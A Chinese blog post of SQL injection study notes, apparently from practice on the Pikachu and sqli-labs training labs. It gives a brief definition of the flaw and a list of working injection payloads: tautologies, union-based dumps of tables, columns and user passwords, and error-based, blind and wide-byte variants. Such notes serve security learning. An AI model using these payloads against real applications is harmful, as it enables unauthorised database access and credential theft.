8.30日网络安全知识整理（sql）

块引用文本

已于 2024-09-07 15:59:31 修改

阅读量1.3k

点赞数 20

文章标签： web安全安全

于 2024-09-02 11:31:01 首次发布

本文链接：https://blog.csdn.net/kaka6764/article/details/141799580

版权

1.sql注入原理

主要是开发人员在构建代码时，没有对输入边界进行安全考虑，导致攻击者可以通过合法的输入点提交一些精心构造的语句，从而欺骗后台数据库对其进行执行，导致数据库信息泄漏的一种漏洞。

2.sql注入常用函数

来自于sql练习中使用过的函数

pikachu漏洞练习第四章节SQL注入-数字型注入（post）练习收获_post注入-CSDN博客

pikachu漏洞练习第四章节SQL注入-字符型注入（get）练习收获_pikachu sql注入第四关-CSDN博客

pikachu漏洞练习第四章节SQL注入-insert/update，delete注入练习收获-CSDN博客

pikachu漏洞练习第四章节SQL注入-搜索型，xx型注入练习收获-CSDN博客

pikachu漏洞练习第四章节SQL注入-http header注入练习收获-CSDN博客

pikachu漏洞练习第四章节SQL注入-基于boolian的盲注，原理练习收获-CSDN博客

pikachu漏洞练习第四章sql注入-宽字节注入练习收获-CSDN博客

pikachu漏洞练习第四章节SQL注入-盲注based on time，原理练习收获-CSDN博客

sqli-labs漏洞练习1-6关练习收获,sqli手工注入与sqlmap使用-CSDN博客

select 字段1，字段2 from 表名 where username = 'name' or 1=1#';
select 字段1，字段2 from 表名 where username = 'name' or 1=1#';
select * from member where username like '%a%';
sql%' or 1=1 #
sql') or 1=1 #
' or updatexml(1,concat(0x7e,database()),0) or '
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=1") order by 3--+
?id=-1") union select 1,2,3--+
?id=-1") union select 1,database(),version()--+
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1") union select 1,2,group_concat(username ,id , password) from users--+
allen' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<113#
name=allen%df' union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2#
name=allen%df' union select (select group_concat(column_name) from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database())limit 3,1)),2#